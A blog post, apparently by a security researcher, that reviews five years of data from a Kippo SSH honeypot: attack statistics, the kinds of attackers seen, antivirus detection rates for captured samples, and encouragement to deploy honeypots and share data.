Five years ago we started with our first Kippo honeypot. The goal was to gather information about attackers and to visualize what attackers are doing. Last week after 5 years of duty, it was time for a hardware change. We finally executed the ’poweroff ‘ command. Within 10 seconds the honeypot silenced forever. The data turned out to be much more then we hoped for. We received a large amount of honeypot data and ran some stats which we would like to share.
First attack: July 2010
Last attack: July 2015
Total login attempts: 3620211
Total number of commands: 42688
Total number of TTY: 6207
Most used username: root (duh)
Most used password: root (duh)
Most used client: SSH-2.0-Putty
Most used command: ls
Number of password changes attempts: 279
Total number of downloads: 15484
‘OMG’, what an amazing amount of data. Of course we did regular monitoring but seeing all this data at once. It still amazes me how many different attacks we recorded. First there is the script kid who is trying to create his own botnet, then there is the kind of people who like to play GTA and are trying to setup a gaming server to play with their friends and at last of course the more serious attacker.
We try to push most of the gathered samples to VT. Some of the time the samples had a detection ratio of 0 or close to zero. This shows that attackers constantly recompile or update tools which they are using. Although lately the detection ratio increased this is mostly due to automated attacks and better detection by AV companies. This data has been used to make the world a bit more secure, but also to explain to people that antivirus applications are not always accurate. Which is pretty obvious in the community, but not for the typical management suite.
Sometimes attacks are just so funny to see. Attackers use their own name as password or download files from their own webpage. Operational security is not always in place. I know your own name is easy to remember.. but seriously.
Lately we have seen many attacks from the recently exposed ‘team’ named ‘CHINaZ’ by MalwareMostDie. After the recent takedowns the attacks dried up or better completely disappeared. Which was an amazing job.
If you or your organization is thinking about deploying honeypots. Then I’ve only one advice.. do it. The amount of information which you are getting is so important. The possibilities with this information are endless, for instance you can compare firewall logs with the data from your honeypot. Or just share the information within the community. A while ago someone asked me why sharing data is important. There is no easy answer, everybody has his own motivations. I think that alerting others about threats makes the internet safer. Just be careful.
A big thank you to the community for providing the opensource tools especially Ion Koniaris and Upi Tamminen!